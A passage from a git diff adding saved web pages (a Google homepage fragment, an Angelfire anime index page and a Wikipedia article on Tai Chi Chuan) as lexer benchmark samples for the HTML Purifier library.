onClick="return qs(this);">News</a> <a id=5a class=q href="http://froogle.google.com/frghp?hl=en&tab=wf" onClick="return qs(this);">Froogle</a> <a id=8a class=q href="/lochp?hl=en&tab=wl" onClick="return qs(this);">Local</a> <b><a href="/intl/en/options/" class=q>more »</a></b></font></td></tr></table><table cellspacing=0 cellpadding=0><tr><td width=25%> </td><td align=center><input type=hidden name=hl value=en><input maxlength=2048 size=55 name=q value="" title="Google Search"><br><input type=submit value="Google Search" name=btnG><input type=submit value="I'm Feeling Lucky" name=btnI></td><td valign=top nowrap width=25%><font size=-2> <a href=/advanced_search?hl=en>Advanced Search</a><br> <a href=/preferences?hl=en>Preferences</a><br> <a href=/language_tools?hl=en>Language Tools</a></font></td></tr></table></form><br><br><font size=-1><a href="/ads/">Advertising Programs</a> - <a href=/services/>Business Solutions</a> - <a href=/about.html>About Google</a></font><p><font size=-2>©2006 Google</font></p></center></body></html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/benchmarks/samples/Lexer/3.html b/lib/htmlpurifier/benchmarks/samples/Lexer/3.html new file mode 100644 index 000000000..9e9f1a361 --- /dev/null +++ b/lib/htmlpurifier/benchmarks/samples/Lexer/3.html @@ -0,0 +1,131 @@ +<html> +<head> +<title>Anime Digi-Lib Index</title> +<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> +</head> + +<div id="tb"> + +<form name="lycos_search" method="get" target="_new" style="margin: 0px" + action="http://r.hotbot.com/r/memberpgs_lycos_searchbox_af/http://www.angelfire.lycos.com/cgi-bin/search/pursuit"> + + <table id="tbtable" cellpadding="0" cellspacing="0" border="0" width="100%" style="border: 1px solid black;"> + <tr style="background-color: #dcf7ff"> + <td colspan="3"> + <table cellpadding="0" cellspacing="0" border="0"> + <tr> + <td> Search:</td> + + <td><input type="radio" name="cat" value="lycos" checked></td> + <td nowrap="nowrap">The Web</td> + <td><input type="radio" name="cat" value="angelfire"></td> + <td nowrap="nowrap">Angelfire</td> + <td nowrap="nowrap"> <img src="http://af.lygo.com/d/toolbar/planeticon.gif"></td><td nowrap="nowrap"> <a href="http://r.lycos.com/r/tlbr_planet/http://planet.lycos.com" target="_new">Planet</a></td> + </tr> + </table> + <td nowrap="nowrap"><a href="http://lt.angelfire.com/af_toolbar/edit/_h_/www.angelfire.lycos.com/build/index.tmpl" target="_top"> + <span id="build">Edit your Site</span></a> </td> + + <td><img src="http://af.lygo.com/d/toolbar/dir.gif" alt="show site directory" border="0" height="10" hspace="3" width="8"></td> + <td nowrap="nowrap"><a href="http://lt.angelfire.com/af_toolbar/browse/_h_/www.angelfire.lycos.com/directory/index.tmpl" target="_top">Browse Sites</a> </td> + <td><a href="http://lt.angelfire.com/af_toolbar/angelfire/_h_/www.angelfire.lycos.com" target="_top"><img src="http://af.lygo.com/d/toolbar/aflogo_top.gif" alt="hosted by angelfire" border="0" height="26" width="143"></a></td> + </tr> + <tr style="background-color: #dcf7ff"> + <td nowrap="nowrap" valign="middle"> <input size="30" style="font-size: 10px; background-color: #fff;" type="text" name="query" id="searchbox"></td> + + <td style="background: #fff url(http://af.lygo.com/d/toolbar/bg.gif) repeat-x; text-align: center;" colspan="3" align="center"> + <a href="http://clk.atdmt.com/VON/go/lycsnvon0710000019von/direct/01/"><img src="/sys/free_logo_xxxx_157x20.gif" height="20" width="157" border="0" alt="Vonage"></a><img src="http://view.atdmt.com/VON/view/lycsnvon0710000019von/direct/01/"></td> + + <span style="font-size: 11px;"> + <span style="color:#00f; font-weight:bold;">«</span> + <span id="top100"> + <a href="javascript:void top100('prev')" target="_top">Previous</a> | + <a href="http://lt.angelfire.com/af_toolbar/top100/_h_/www.angelfire.lycos.com/cgi-bin/top100/pagelist?start=1" target="_top">Top 100</a> | + <a href="javascript:void top100('next')" target="_top">Next</a> + + </span> + <span style="color: #00f; font-weight: bold;">»</span> + </span> + </td> + <td valign="top" style="background: #fff url(http://af.lygo.com/d/toolbar/bg.gif) repeat-x;"><a href="http://lt.angelfire.com/af_toolbar/angelfire/_h_/www.angelfire.lycos.com" target="_top"><img src="http://af.lygo.com/d/toolbar/aflogo_bot.gif" alt="hosted by angelfire" border="0" height="22" width="143"></a></td> + </tr> + </table> + </form> + </div> + +<table border="0" cellpadding="0" cellspacing="0" width="728"><tr><td> + <script type="text/javascript"> +if (objAdMgr.isSlotAvailable("leaderboard")) { + objAdMgr.renderSlot("leaderboard") +} +</script> +<noscript> +<a href="http://network.realmedia.com/RealMedia/ads/click_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/491169@Top1?x"><img border="0" src="http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/lycosangelfire/ros/728x90/wp/ss/a/491169@Top1" alt="leaderboard ad" /></a> +</noscript> + +</td></tr> +</table> +<table width="86%" border="0" cellspacing="0" cellpadding="2"> + <tr> + <td height="388" width="19%" bgcolor="#FFCCFF" valign="top"> + <p>May 1, 2000</p> + <p><b>Pop Culture</b> </p> + <p>by. H. Finkelstein</p> + + </td> + <td height="388" width="52%" valign="top"> + <p>Welcome to the <b>Anime Digi-Lib</b>, a virtual index to anime on the + internet. This site strives to house a comprehensive index to both personal + and commercial websites and provides reviews to these sites. We hope to + be a gateway for people who've never imagined they'd ever be interested + in Japanese Animation. </p> + <table width="99%" border="1" cellspacing="0" cellpadding="2" height="320" name="Searchnservices"> + <tr> + <td height="263" valign="top" width="58%"> + <p> </p> + <p> </p> + +<FORM ACTION="/cgi-bin/script_library/site_search/search" METHOD="GET"> + +<table border="0" cellpadding="2" cellspacing="0"> +<tr> +<td colspan="2">Search term: <INPUT NAME="search_term"><br></td> +</tr> +<tr> +<td colspan="2" align="center">Case-sensitive - +<INPUT TYPE="checkbox" NAME="case_sensitive">yes<br></td> +</tr> +<tr> +<td align="right"><INPUT TYPE="radio" NAME="search_type" VALUE="exact" CHECKED>exact</td> +<td><INPUT TYPE="radio" NAME="search_type" VALUE="fuzzy">fuzzy<br></td> + +</tr> +<tr> +<td colspan="2" align="center"><INPUT TYPE="hidden" NAME="display" VALUE="#FF0000"><INPUT TYPE="submit"></td> +</tr> +</table> +</form> + + + <td> + <table border="0" cellpadding="0" cellspacing="0" width="100%"> +<tr><td><font face="verdana,geneva" color="#000011" size="1">What is better, subtitled or dubbed anime?</font></td></tr> +<tr><td><input type="radio" name="rd" value="1"><font face="verdana" size="2" color="#000011">Subtitled</font></td></tr> + +<tr><td align="middle"><font face="verdana" size="1"><a href="http://pub.alxnet.com/poll?id=2079873&q=view">Current results</a></font></td></tr> +</table></td></tr> + <tr> + <td><font face="verdana" size="1"><a href="http://www.alxnet.com/services/poll/">Free + Web Polls</a></font></td> + </tr> +</table></form> +<!-- Alxnet.com -- web poll code ends --> + </td> + </tr> +</table> +</body> + +</html> + +<!-- vim: et sw=4 sts=4 +--> diff --git a/lib/htmlpurifier/benchmarks/samples/Lexer/4.html b/lib/htmlpurifier/benchmarks/samples/Lexer/4.html new file mode 100644 index 000000000..27cea255f --- /dev/null +++ b/lib/htmlpurifier/benchmarks/samples/Lexer/4.html @@ -0,0 +1,543 @@ +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> + <head> + <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> + <meta name="keywords" content="Tai Chi Chuan,Yang Pan-hou,Yang Chien-hou,Yang style Tai Chi Chuan,Yang Lu-ch'an,Wu/Hao style T'ai Chi Ch'uan,Wu Ch'uan-yü,Hao Wei-chen,Yang Shou-chung,Wu style T'ai Chi Ch'uan,Wu Chien-ch'üan" /> +<link rel="shortcut icon" href="/favicon.ico" /> +<link rel="copyright" href="http://www.gnu.org/copyleft/fdl.html" /> + <title>Tai Chi Chuan - Wikipedia, the free encyclopedia</title> + <style type="text/css" media="screen,projection">/*<![CDATA[*/ @import "/skins-1.5/monobook/main.css?9"; /*]]>*/</style> + <link rel="stylesheet" type="text/css" media="print" href="/skins-1.5/common/commonPrint.css" /> + + <!--[if lt IE 5.5000]><style type="text/css">@import "/skins-1.5/monobook/IE50Fixes.css";</style><![endif]--> + <!--[if IE 5.5000]><style type="text/css">@import "/skins-1.5/monobook/IE55Fixes.css";</style><![endif]--> + <!--[if IE 6]><style type="text/css">@import "/skins-1.5/monobook/IE60Fixes.css";</style><![endif]--> + <!--[if IE 7]><style type="text/css">@import "/skins-1.5/monobook/IE70Fixes.css?1";</style><![endif]--> + <!--[if lt IE 7]><script type="text/javascript" src="/skins-1.5/common/IEFixes.js"></script> + <meta http-equiv="imagetoolbar" content="no" /><![endif]--> + <script type="text/javascript">var skin = 'monobook';var stylepath = '/skins-1.5';</script> + <script type="text/javascript" src="/skins-1.5/common/wikibits.js?1"><!-- wikibits js --></script> + <script type="text/javascript" src="/w/index.php?title=-&action=raw&smaxage=0&gen=js"><!-- site js --></script> + + <style type="text/css">/*<![CDATA[*/ +@import "/w/index.php?title=MediaWiki:Common.css&action=raw&ctype=text/css&smaxage=2678400"; +@import "/w/index.php?title=MediaWiki:Monobook.css&action=raw&ctype=text/css&smaxage=2678400"; +@import "/w/index.php?title=-&action=raw&gen=css&maxage=2678400&ts=20060721225848"; +@import "/w/index.php?title=User:Edward_Z._Yang/monobook.css&action=raw&ctype=text/css"; +/*]]>*/</style> + <script type="text/javascript" src="/w/index.php?title=User:Edward_Z._Yang/monobook.js&action=raw&ctype=text/javascript&dontcountme=s"></script> + <!-- Head Scripts --> + </head> +<body class="ns-0 ltr"> + <div id="globalWrapper"> + <div id="column-content"> + <div id="content"> + + <a name="top" id="top"></a> + <div id="siteNotice"><div id="wikimania2006" style="text-align:right; font-size:80%"><a href="http://wm06reg.wikimedia.org/" class="external text" title="http://wm06reg.wikimedia.org/">Registration</a> for <a href="http://wikimania2006.wikimedia.org" class="external text" title="http://wikimania2006.wikimedia.org">Wikimania 2006</a> is open. </div> +</div> <h1 class="firstHeading">Tai Chi Chuan</h1> + <div id="bodyContent"> + <h3 id="siteSub">From Wikipedia, the free encyclopedia</h3> + + <div id="contentSub"></div> + <div id="jump-to-nav">Jump to: <a href="#column-one">navigation</a>, <a href="#searchInput">search</a></div> <!-- start content --> + <table border="1" cellpadding="2" cellspacing="0" align="right"> +<tr> +<th colspan="2" bgcolor="#FFCCCC"><big>???</big></th> +</tr> +<tr> +<td colspan="2"> + +<div class="center"> +<div class="thumb tnone"> +<div style="width:182px;"><a href="/wiki/Image:Yang_Ch%27eng-fu_circa_1918.jpg" class="internal" title="Yang Chengfu in a posture from the Tai Chi solo form known as Single Whip, circa 1918"><img src="http://upload.wikimedia.org/wikipedia/en/thumb/d/d1/Yang_Ch%27eng-fu_circa_1918.jpg/180px-Yang_Ch%27eng-fu_circa_1918.jpg" alt="Yang Chengfu in a posture from the Tai Chi solo form known as Single Whip, circa 1918" width="180" height="255" longdesc="/wiki/Image:Yang_Ch%27eng-fu_circa_1918.jpg" /></a> +<div class="thumbcaption"> +<div class="magnify" style="float:right"><a href="/wiki/Image:Yang_Ch%27eng-fu_circa_1918.jpg" class="internal" title="Enlarge"><img src="/skins-1.5/common/images/magnify-clip.png" width="15" height="11" alt="Enlarge" /></a></div> +<b><a href="/wiki/Yang_Chengfu" title="Yang Chengfu">Yang Chengfu</a> in a posture from the Tai Chi solo form known as <i>Single Whip</i>, circa <a href="/wiki/1918" title="1918">1918</a></b></div> +</div> +</div> +</div> +</td> +</tr> + +<tr> +<th colspan="2"><a href="/wiki/Chinese_language" title="Chinese language">Chinese</a> Name</th> +</tr> +<tr> +<td><a href="/wiki/Hanyu_Pinyin" title="Hanyu Pinyin">Hanyu Pinyin</a></td> +<td>Tàijíquán</td> +</tr> +<tr> +<td><a href="/wiki/Wade-Giles" title="Wade-Giles">Wade-Giles</a></td> +<td>T'ai<sup>4</sup> Chi<sup>2</sup> Ch'üan<sup>2</sup></td> + +</tr> +<tr> +<td><a href="/wiki/Simplified_Chinese" title="Simplified Chinese">Simplified Chinese</a></td> +<td>???</td> +</tr> +<tr> +<td><a href="/wiki/Traditional_Chinese" title="Traditional Chinese">Traditional Chinese</a></td> +<td><a href="http://en.wiktionary.org/wiki/%E5%A4%AA" class="extiw" title="wiktionary:?">?</a><a href="http://en.wiktionary.org/wiki/%E6%A5%B5" class="extiw" title="wiktionary:?">?</a><a href="http://en.wiktionary.org/wiki/%E6%8B%B3" class="extiw" title="wiktionary:?">?</a></td> +</tr> +<tr> +<td><a href="/wiki/Cantonese_%28linguistics%29" title="Cantonese (linguistics)">Cantonese</a></td> + +<td>taai3 gik6 kyun4</td> +</tr> +<tr> +<td><a href="/wiki/Hiragana" title="Hiragana">Japanese Hiragana</a></td> +<td>???????</td> +</tr> +<tr> +<td><a href="/wiki/Korean_%28language%29" title="Korean (language)">Korean</a></td> +<td>???</td> +</tr> +<tr> +<td><a href="/wiki/Vietnamese_%28language%29" title="Vietnamese (language)">Vietnamese</a></td> + +<td>Thái C?c Quy?n</td> +</tr> +</table> +<p><b>Tai Chi Chuan</b>, <b>T'ai Chi Ch'üan</b> or <b>Taijiquan</b> (<a href="/wiki/Traditional_Chinese_character" title="Traditional Chinese character">Traditional Chinese</a>: ???; <a href="/wiki/Simplified_Chinese_character" title="Simplified Chinese character">Simplified Chinese</a>: ???; <a href="/wiki/Pinyin" title="Pinyin">pinyin</a>: Tàijíquán; literally "supreme ultimate fist"), commonly known as <b>Tai Chi</b>, <b>T'ai Chi</b>, or <b><a href="/wiki/Taiji" title="Taiji">Taiji</a></b>, is an <a href="/wiki/Neijia" title="Neijia">internal</a> <a href="/wiki/Chinese_martial_arts" title="Chinese martial arts">Chinese martial art</a>. There are different styles of T'ai Chi Ch'üan, although most agree they are all based on the system originally taught by the <a href="/wiki/Chen" title="Chen">Chen</a> family to the <a href="/wiki/Yang" title="Yang">Yang</a> family starting in <a href="/wiki/1820" title="1820">1820</a>. It is often promoted and practiced as a <a href="/wiki/Martial_arts_therapy" title="Martial arts therapy">martial arts therapy</a> for the purposes of <a href="/wiki/Health" title="Health">health</a> and <a href="/wiki/Longevity" title="Longevity">longevity</a>, (some <a href="/wiki/Tai_Chi_Chuan#Citations_to_medical_research" title="Tai Chi Chuan">recent medical studies</a> support its effectiveness). T'ai Chi Ch'üan is considered a <i>soft</i> style martial art, an art applied with as complete a relaxation or "softness" in the musculature as possible, to distinguish its theory and application from that of the <i>hard</i> martial art styles which use a degree of tension in the muscles.</p> + +<p>Variations of T'ai Chi Ch'üan's basic training forms are well known as the slow motion routines that groups of people practice every morning in parks across China and other parts of the world. Traditional T'ai Chi training is intended to teach awareness of one's own balance and what affects it, awareness of the same in others, an appreciation of the practical value in one's ability to moderate extremes of behavior and attitude at both mental and physical levels, and how this applies to effective self-defense principles.</p> +<table id="toc" class="toc" summary="Contents"> +<tr> +<td> +<div id="toctitle"> +<h2>Contents</h2> +</div> +<ul> +<li class="toclevel-1"><a href="#Overview"><span class="tocnumber">1</span> <span class="toctext">Overview</span></a></li> +<li class="toclevel-1"><a href="#Training_and_techniques"><span class="tocnumber">2</span> <span class="toctext">Training and techniques</span></a></li> + +<li class="toclevel-1"><a href="#Styles_and_history"><span class="tocnumber">3</span> <span class="toctext">Styles and history</span></a> +<ul> +<li class="toclevel-2"><a href="#Family_tree"><span class="tocnumber">3.1</span> <span class="toctext">Family tree</span></a></li> +<li class="toclevel-2"><a href="#Notes_to_Family_tree_table"><span class="tocnumber">3.2</span> <span class="toctext">Notes to Family tree table</span></a></li> +</ul> +</li> +<li class="toclevel-1"><a href="#Modern_T.27ai_Chi"><span class="tocnumber">4</span> <span class="toctext">Modern T'ai Chi</span></a> + +<ul> +<li class="toclevel-2"><a href="#Modern_forms"><span class="tocnumber">4.1</span> <span class="toctext">Modern forms</span></a></li> +</ul> +</li> +<li class="toclevel-1"><a href="#Health_benefits"><span class="tocnumber">5</span> <span class="toctext">Health benefits</span></a> +<ul> +<li class="toclevel-2"><a href="#Citations_to_medical_research"><span class="tocnumber">5.1</span> <span class="toctext">Citations to medical research</span></a></li> +</ul> + +</li> +<li class="toclevel-1"><a href="#See_also"><span class="tocnumber">6</span> <span class="toctext">See also</span></a></li> +<li class="toclevel-1"><a href="#External_links"><span class="tocnumber">7</span> <span class="toctext">External links</span></a></li> +</ul> +</td> +</tr> +</table> +<p><script type="text/javascript"> +//<![CDATA[ + if (window.showTocToggle) { var tocShowText = "show"; var tocHideText = "hide"; showTocToggle(); } +//]]> +</script></p> +<div class="editsection" style="float:right;margin-left:5px;">[<a href="/w/index.php?title=Tai_Chi_Chuan&action=edit&section=1" title="Edit section: Overview">edit</a>]</div> + +<p><a name="Overview" id="Overview"></a></p> +<h2>Overview</h2> +<p>Historically, T'ai Chi Ch'üan has been regarded as a martial art, and its traditional practitioners still teach it as one. Even so, it has developed a worldwide following among many thousands of people with little or no interest in martial training for its aforementioned benefits to health and <a href="/wiki/Preventive_medicine" title="Preventive medicine">health maintenance</a>. Some call it a form of moving <a href="/wiki/Meditation" title="Meditation">meditation</a>, and T'ai Chi theory and practice evolved in agreement with many of the principles of <a href="/wiki/Traditional_Chinese_medicine" title="Traditional Chinese medicine">traditional Chinese medicine</a>. Besides general health benefits and <a href="/wiki/Stress_management" title="Stress management">stress management</a> attributed to beginning and intermediate level T'ai Chi training, many therapeutic interventions along the lines of traditional Chinese medicine are taught to advanced T'ai Chi students.</p> +<p>T'ai Chi Ch'üan as physical training is characterized by its requirement for the use of leverage through the joints based on coordination in relaxation rather than muscular tension in order to neutralize or initiate physical attacks. The slow, repetitive work involved in that process is said to gently increase and open the internal circulation (<a href="/wiki/Breath" title="Breath">breath</a>, body heat, <a href="/wiki/Blood" title="Blood">blood</a>, <a href="/wiki/Lymph" title="Lymph">lymph</a>, <a href="/wiki/Peristalsis" title="Peristalsis">peristalsis</a>, etc.). Over time, proponents say, this enhancement becomes a lasting effect, a direct reversal of the constricting physical effects of stress on the human body. This reversal allows much more of the students' native energy to be available to them, which they may then apply more effectively to the rest of their lives; families, careers, spiritual or creative pursuits, hobbies, etc.</p> + +<p>The study of T'ai Chi Ch'üan involves three primary subjects:</p> +<ul> +<li><b>Health</b> - an unhealthy or otherwise uncomfortable person will find it difficult to meditate to a state of calmness or to use T'ai Chi as a martial art. T'ai Chi's health training therefore concentrates on relieving the physical effects of stress on the body and mind.</li> +<li><b>Meditation</b> - the focus meditation and subsequent calmness cultivated by the meditative aspect of T'ai Chi is seen as necessary to maintain optimum health (in the sense of effectively maintaining stress relief or <a href="/wiki/Homeostasis" title="Homeostasis">homeostasis</a>) and in order to use it as a soft style martial art.</li> +<li><b>Martial art</b> - the ability to competently use T'ai Chi as a martial art is said to be proof that the health and meditation aspects are working according to the dictates of the theory of T'ai Chi Ch'üan.</li> + +</ul> +<p>In its traditional form (many modern variations exist which ignore at least one of the above requirements) every aspect of its training has to conform with all three of the aforementioned categories.</p> +<p>The <a href="/wiki/Mandarin_%28linguistics%29" title="Mandarin (linguistics)">Mandarin</a> term "T'ai Chi Ch'üan" translates as "Supreme Ultimate Boxing" or "Boundless Fist". T'ai Chi training involves learning solo routines, known as <i>forms</i>, and two person routines, known as <i><a href="/wiki/Pushing_hands" title="Pushing hands">pushing hands</a></i>, as well as <i><a href="/wiki/Acupressure" title="Acupressure">acupressure</a></i>-related manipulations taught by traditional schools. T'ai Chi Ch'üan is seen by many of its schools as a variety of <a href="/wiki/Taoism" title="Taoism">Taoism</a>, and it does seemingly incorporate many Taoist principles into its practice (see below). It is an art form said to date back many centuries (although not reliably documented under that name before 1850), with precursor disciplines dating back thousands of years. The explanation given by the traditional T'ai Chi family schools for why so many of their previous generations have dedicated their lives to the study and preservation of the art is that the discipline it seems to give its students to dramatically improve the effects of stress in their lives, with a few years of hard work, should hold a useful purpose for people living in a stressful world. They say that once the T'ai Chi principles have been understood and internalized into the bodily framework the practitioner will have an immediately accessible "toolkit" thereby to improve and then maintain their health, to provide a meditative focus, and that can work as an effective and subtle martial art for self-defense.</p> +<p>Teachers say the study of T'ai Chi Ch'üan is, more than anything else, about challenging one's ability to change oneself appropriately in response to outside forces. These principles are taught using the examples of <a href="/wiki/Physics" title="Physics">physics</a> as experienced by two (or more) bodies in <a href="/wiki/Combat" title="Combat">combat</a>. In order to be able to protect oneself or someone else by using change, it is necessary to understand what the consequences are of changing appropriately, changing inappropriately and not changing at all in response to an attack. Students, by this theory, will appreciate the full benefits of the entire art in the fastest way through physical training of the martial art aspect.</p> + +<p><a href="/wiki/Wu_Chien-ch%27uan" title="Wu Chien-ch'uan">Wu Chien-ch'üan</a>, co-founder of the Wu family style, described the name <i>T'ai Chi Ch'üan</i> this way at the beginning of the <a href="/wiki/20th_century" title="20th century">20th century</a>:</p> +<dl> +<dd>"Various people have offered different explanations for the name <i>T'ai Chi Ch'uan</i>. Some have said: 'In terms of self-cultivation, one must train from a state of movement towards a state of stillness. <i>T'ai Chi</i> comes about through the balance of <i><a href="/wiki/Yin" title="Yin">yin</a></i> and <i><a href="/wiki/Yang" title="Yang">yang</a></i>. In terms of the art of attack and defense then, in the context of the <a href="/wiki/I_Ching" title="I Ching">changes</a> of full and empty, one is constantly internally latent, not outwardly expressive, as if the <i>yin</i> and <i>yang</i> of <i>T'ai Chi</i> have not yet divided apart.'</dd> + +<dd>Others say: 'Every movement of <i>T'ai Chi Ch'uan</i> is based on circles, just like the shape of a <a href="/wiki/Taijitu" title="Taijitu"><i>T'ai Chi</i> symbol</a>. Therefore, it is called <i>T'ai Chi Ch'uan</i>.' Both explanations are quite reasonable, especially the second, which is more complete."</dd> +</dl> +<div class="editsection" style="float:right;margin-left:5px;">[<a href="/w/index.php?title=Tai_Chi_Chuan&action=edit&section=2" title="Edit section: Training and techniques">edit</a>]</div> +<p><a name="Training_and_techniques" id="Training_and_techniques"></a></p> + +<h2>Training and techniques</h2> +<div class="thumb tright"> +<div style="width:182px;"><a href="/wiki/Image:Yin_yang.svg" class="internal" title="The T'ai Chi Symbol or T'ai Chi T'u (Taijitu)"><img src="http://upload.wikimedia.org/wikipedia/commons/thumb/1/17/Yin_yang.svg/180px-Yin_yang.svg.png" alt="The T'ai Chi Symbol or T'ai Chi T'u (Taijitu)" width="180" height="180" longdesc="/wiki/Image:Yin_yang.svg" /></a> +<div class="thumbcaption"> +<div class="magnify" style="float:right"><a href="/wiki/Image:Yin_yang.svg" class="internal" title="Enlarge"><img src="/skins-1.5/common/images/magnify-clip.png" width="15" height="11" alt="Enlarge" /></a></div> +<b>The T'ai Chi Symbol or T'ai Chi T'u (Taijitu)</b></div> +</div> +</div> +<p>As the name <i>T'ai Chi Ch'üan</i> is held to be derived from the T'ai Chi symbol, the <i>taijitu</i> or <i>t'ai chi t'u</i> (???, <a href="/wiki/Pinyin" title="Pinyin">pinyin</a> tàijítú), commonly known in the West as the "<a href="/wiki/Yin-yang" title="Yin-yang">yin-yang</a>" diagram, T'ai Chi Ch'üan techniques are said therefore to physically and energetically balance <i>yin</i> (receptive) and <i>yang</i> (active) principles: "From ultimate softness comes ultimate hardness."</p> + +<p>The core training involves two primary features: the first being the solo form or <i>ch'üan</i>, a slow sequence of movements which emphasize a straight spine, relaxed breathing and a natural range of motion; the second being different styles of <i>pushing hands</i> or <i>t'ui shou</i> (??) for training "stickiness" and sensitivity in the reflexes through various motions from the forms in concert with a training partner in order to learn leverage, timing, coordination and positioning when interacting with another. Pushing hands is seen as necessary not only for training the self-defense skills of a soft style such as T'ai Chi by demonstrating the forms' movement principles experientially, but also it is said to improve upon the level of conditioning provided by practice of the solo forms by increasing the workload on students while they practice those movement principles.</p> +<p>The solo form should take the students through a complete, natural, range of motion over their centre of gravity. Accurate, repeated practice of the solo routine is said to retrain posture, encourage circulation throughout the students' bodies, maintain flexibility through their joints and further familiarize students with the martial application sequences implied by the forms. The major traditional styles of T'ai Chi have forms which differ somewhat cosmetically, but there are also many obvious similarities which point to their common origin. The solo forms, empty-hand and <a href="/wiki/Weapon" title="Weapon">weapon</a>, are catalogues of movements that are practised individually in pushing hands and martial application scenarios to prepare students for self-defence training. In most traditional schools different variations of the solo forms can be practiced; fast/slow, small circle/large circle, square/round (which are different expressions of leverage through the joints), low sitting/high sitting (the degree to which weight-bearing knees are kept bent throughout the form), for example.</p> +<p>In a fight, if one uses hardness to resist violent force then both sides are certain to be injured, at least to some degree. Such injury, according to T'ai Chi theory, is a natural consequence of meeting brute force with brute force. The collision of two like forces, yang with yang, is known as "double-weighted" in T'ai Chi terminology. Instead, students are taught not to fight or resist an incoming force, but to meet it in softness and "stick" to it, following its motion while remaining in physical contact until the incoming force of attack exhausts itself or can be safely redirected, the result of meeting yang with yin. Done correctly, achieving this yin/yang or yang/yin balance in combat (and, by extension, other areas of one's life) is known as being "single-weighted" and is a primary goal of T'ai Chi Ch'üan training. <a href="/wiki/Lao_Tzu" title="Lao Tzu">Lao Tzu</a> provided the <a href="/wiki/Archetype" title="Archetype">archetype</a> for this in the <a href="/wiki/Tao_Te_Ching" title="Tao Te Ching">Tao Te Ching</a> when he wrote, "The soft and the pliable will defeat the hard and strong." This soft "neutralization" of an attack can be accomplished very quickly in an actual fight by an adept practitioner. A T'ai Chi student has to be well conditioned by many years of disciplined training; stable, sensitive and elastic mentally and physically in order to realize this ability, however.</p> + +<p>Other training exercises include:</p> +<ul> +<li>Weapons training and <a href="/wiki/Fencing" title="Fencing">fencing</a> applications employing the straight <i><a href="/wiki/Sword" title="Sword">sword</a></i> known as the <i>jian</i> or <i>chien</i> or <i>gim</i> (<a href="/wiki/Jian" title="Jian">jiàn</a> ?), a heavier curved <i>sabre</i>, sometimes called a <i>broadsword</i> or <i>tao</i> (<a href="/wiki/Dao_%28saber%29" title="Dao (saber)">dao</a> ?, which is actually considered a big <i><a href="/wiki/Knife" title="Knife">knife</a></i>), folding <i><a href="/wiki/Tessen" title="Tessen">fan</a></i>, <i>staff</i> (?), 7 foot (2 m) <i><a href="/wiki/Qiang_%28spear%29" title="Qiang (spear)">spear</a></i> and 13 foot (4 m) <i><a href="/wiki/Lance" title="Lance">lance</a></i> (both called qiang ?). More exotic weapons still used by some traditional styles are the large <i>Da Dao</i> or <i>Ta Tao</i> (??) sabre, <i><a href="/wiki/Ji_%28halberd%29" title="Ji (halberd)">halberd</a></i> (ji ?), <i>cane</i>, <i>rope-dart</i>, <i><a href="/wiki/Three_sectional_staff" title="Three sectional staff">three sectional staff</a></i>, <i><a href="/wiki/Lasso" title="Lasso">lasso</a></i>, <i><a href="/wiki/Whip" title="Whip">whip</a></i>, <i><a href="/wiki/Chain_whip" title="Chain whip">chain whip</a></i> and <i>steel whip</i>.</li> + +<li>Two-person tournament sparring (as part of push hands competitions and/or <i><a href="/wiki/San_shou" title="San shou">san shou</a></i> ??);</li> +<li>Breathing exercises; <i><a href="/wiki/Nei_kung" title="Nei kung">nei kung</a></i> (?? nèigong) or, more commonly, <i><a href="/wiki/Ch%27i_kung" title="Ch'i kung">ch'i kung</a></i> (?? qìgong) to develop <b><a href="/wiki/Ch%27i" title="Ch'i">ch'i</a></b> (? qì) or "breath energy" in coordination with physical movement and <a href="/wiki/Zhan_zhuang" title="Zhan zhuang">post standing</a> or combinations of the two. These were formerly taught only to disciples as a separate, complementary training system. In the last 50 years they have become more well known to the general public.</li> + +</ul> +<p>T'ai Chi's martial aspect relies on sensitivity to the opponent's movements and centre of gravity dictating appropriate responses. Effectively affecting or "capturing" the opponent's centre of gravity immediately upon contact is trained as the primary goal of the martial T'ai Chi student, and from there all other technique can follow with seeming effortlessness. The alert calmness required to achieve the necessary sensitivity is acquired over thousands of hours of first <i>yin</i> (slow, repetitive, meditative, low impact) and then later adding <i>yang</i> ("realistic," active, fast, high impact) martial training; forms, pushing hands and sparring. T'ai Chi Ch'üan trains in three basic ranges, close, medium and long, and then everything in between. Pushes and open hand strikes are more common than punches, and kicks are usually to the legs and lower torso, never higher than the hip in most styles. The fingers, fists, palms, sides of the hands, wrists, forearms, elbows, shoulders, back, hips, knees and feet are commonly used to strike, with strikes to the eyes, throat, heart, groin and other acupressure points trained by advanced students. There is an extensive repertoire of joint traps, locks and breaks (<a href="/wiki/Chin_na" title="Chin na">chin na</a>), particularly applied to lock up or break an opponent's elbows, wrists, fingers, ankles, back or neck. Most T'ai Chi teachers expect their students to thoroughly learn defensive or neutralizing skills first, and a student will have to demonstrate proficiency with them before offensive skills will be extensively trained. There is also an emphasis in the traditional schools on kind-heartedness. One is expected to show mercy to one's opponents, as instanced by a poem preserved in some of the T'ai Chi families said to be derived from the <a href="/wiki/Shaolin" title="Shaolin">Shaolin</a> temple:</p> +<dl> +<dd>"I would rather maim than kill</dd> + +<dd>Hurt than maim</dd> +<dd>Intimidate than hurt</dd> +<dd>Avoid than intimidate."</dd> +</dl> +<div class="thumb tright"> +<div style="width:352px;"><a href="/wiki/Image:Martial_arts_-_Fragrant_Hills.JPG" class="internal" title="An outdoor Chen style class in Beijing"><img src="http://upload.wikimedia.org/wikipedia/commons/thumb/b/b6/Martial_arts_-_Fragrant_Hills.JPG/350px-Martial_arts_-_Fragrant_Hills.JPG" alt="An outdoor Chen style class in Beijing" width="350" height="233" longdesc="/wiki/Image:Martial_arts_-_Fragrant_Hills.JPG" /></a> +<div class="thumbcaption"> +<div class="magnify" style="float:right"><a href="/wiki/Image:Martial_arts_-_Fragrant_Hills.JPG" class="internal" title="Enlarge"><img src="/skins-1.5/common/images/magnify-clip.png" width="15" height="11" alt="Enlarge" /></a></div> +An outdoor Chen style class in Beijing</div> +</div> +</div> +<div class="editsection" style="float:right;margin-left:5px;">[<a href="/w/index.php?title=Tai_Chi_Chuan&action=edit&section=3" title="Edit section: Styles and 